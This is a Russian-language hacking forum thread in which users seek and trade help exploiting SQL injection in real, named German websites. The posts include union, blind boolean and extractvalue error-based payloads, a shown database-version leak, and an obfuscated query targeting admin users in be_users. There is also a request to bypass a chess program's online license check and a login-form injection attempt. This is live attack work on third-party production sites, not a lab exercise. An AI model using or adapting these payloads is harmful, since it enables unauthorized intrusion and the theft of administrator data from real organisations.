ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.06.2021, 15:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 2469
Репутация:
0
|
|
Здравствуйте, есть шахматная программа, которая требует онлайн-активации. Выяснил, что при вводе 25-значного ключа в программу, активация проходит с помощью проверки данного ключа вот по этому адресу: http://chess-cheat.com/test.php . При каждом обновлении данной страницы в браузере генерируется MD5 хеш 6-ти значных чисел и еще какие-то случайные цифры. Есть ли какие-то мысли об уязвимости?
|
|
|
|

29.06.2021, 21:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 1545
Репутация:
1
|
|
Поиграть руками с логикой. Вероятно это и не скуля вообще, а нестандартное поведение которое и задетектил ваш софт приняв это за sql-injection
|
|
|
|

20.10.2021, 21:31
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос...
Код:
Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160
Код:
Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+select+111,222+--+
|
|
|

24.10.2021, 01:12
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос...
Код:
Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160
Код:
Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+select+111,222+--+
Тут только слепая
tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+and+if ((select+count(*)+from+information_schema.tables+l imit+0,1)=307,1,2)=1+--+
|
|
|

15.11.2021, 16:03
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Помогите, что можно сделать? вывод в коде
Код:
Code:
view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262
Код:
Code:
SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi
|
|
|

16.11.2021, 11:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 36807
Репутация:
1
|
|
help to inject here "from admin"
return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0))having+avg(0)%23&password=dsadsada
return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0) from admin)having+avg(0)%23&password=dsadsada doesn't work
|
|
|
|

16.11.2021, 17:50
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Помогите, что можно сделать? вывод в коде
Код:
Code:
view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262
Код:
Code:
SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi
Немного извращенно, но работать будет
/poi/ extractvalue(1,concat(0x3a,(select@@version)))/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a &external_id=52262
Код:
Code:
XPATH syntax error: ':5.5.62-0ubuntu0.14.04.1'' (46 chars)
Сообщение от eminlayer7788
eminlayer7788 said:
↑
help to inject here "from admin"
return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0))having+avg(0)%23&password=dsadsada
return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0) from admin)having+avg(0)%23&password=dsadsada doesn't work
we are need full url for understanding filters
|
|
|

19.11.2021, 14:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 36807
Репутация:
1
|
|
|
|
|
|

29.11.2021, 16:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 36807
Репутация:
1
|
|
|
|
|
|

03.12.2021, 16:05
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Как обойти where?
Код:
Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and/**/(extractvalue/*a*/(0,concat/**//*a*/(0,(select/**//*a*/(uid)from(be_users)where(admin=1)))))%23
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|